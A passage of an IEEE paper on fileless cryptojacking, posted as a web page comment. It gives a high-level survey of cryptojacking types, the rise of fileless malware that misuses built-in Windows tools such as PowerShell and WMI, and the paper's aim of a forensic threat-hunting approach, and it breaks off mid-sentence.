Comment
Author: Admin | 2025-04-28
[27], [28], [25]. In a cryptojackingattack, a victim may suffer from the lack of computer per-formance, hardware (CPU, GPU, and battery) declining, andhigh electricity bills.There are three types of cryptojacking attacks.1) In-browser Cryptojacking: runs with cryptojackingwebsites that contain hidden mining scripts [29].2) In-host Cryptojacking: runs on operating systems anddisks (ROM) as malicious programs [29].3) In-memory only Cryptojacking: that runs on memory(RAM) only with malicious scripts [30].978-1-6654-0652-9/22/$31.00 ©2022 IEEE Fig. 1. The popularity rate of fileless malware and cryptojacking words on Google.Although in-browser cryptojacking attacks declined afterCoinhive (in-browser crypto-mining service) shutdown inMarch 2019, in-memory cryptojacking is one of the mostprevalent threats in the wild [5]. It was observed 25% morecryptocurrency mining malware in 2020 over 2019 levels[31]. With the rise of fileless malware and cryptojackingincidents, today, cybercriminals have merged these attacks intoa dangerous combo: fileless cryptojacking malware [32]. Eventhough fileless malware and cryptojacking attacks have startedindependently and both attack types gained popularity in 2017,as shown in Fig. 1, cryptojacking incidents were observed withfileless malware attacks after 2019 [32].In this paper, we attempt to provide an understanding of theemerging fileless cryptojacking. The second goal is to fill a gapin the literature that there is no sufficient research on this newproblem. Finally, we present a novel threat hunting-orientedDFIR approach with the best practices derived from academicresearch and field experience. To the best of our knowledge,this paper is one of the first comprehensive research attemptson "fileless cryptojacking."II. FI LE LE SS MA LWARE WORKFLOWMalware analysis relies on the analysis of executable bi-naries, but in fileless malware, there is no actual executablestored on a disk to inspect [7]. It stays and operates in theRandom Access Memory (RAM) and removes the footprintsto increase the difficulty of removal [6]. It is also called non-malware, Advanced Volatile Attack (AVT) [33], or Living-off-the-Land (LotL) attack as threat actors use legitimate tools,processes, benign software utilities, and libraries during an at-tack [8]. These are built-in native and highly reliable Windowsapplications such as Windows Management Instrumentation(WMI) subscriptions, PowerShell, Microsoft Office Macros[10]. Thus, it is stealthy, and it is almost impossible to blocklegitimate built-in tools. In other words, the operating systemattacks itself.However, fileless malware is a broad term, and some attackscan combine file-based attacks with fileless malware. Also,some phases of the attack chain can be fileless while otherscan store files on a disk [34]. Moreover, in a ransomwareincident, the attack was completed by writing the files intothe disk. However, the delivery, execution, and
Add Comment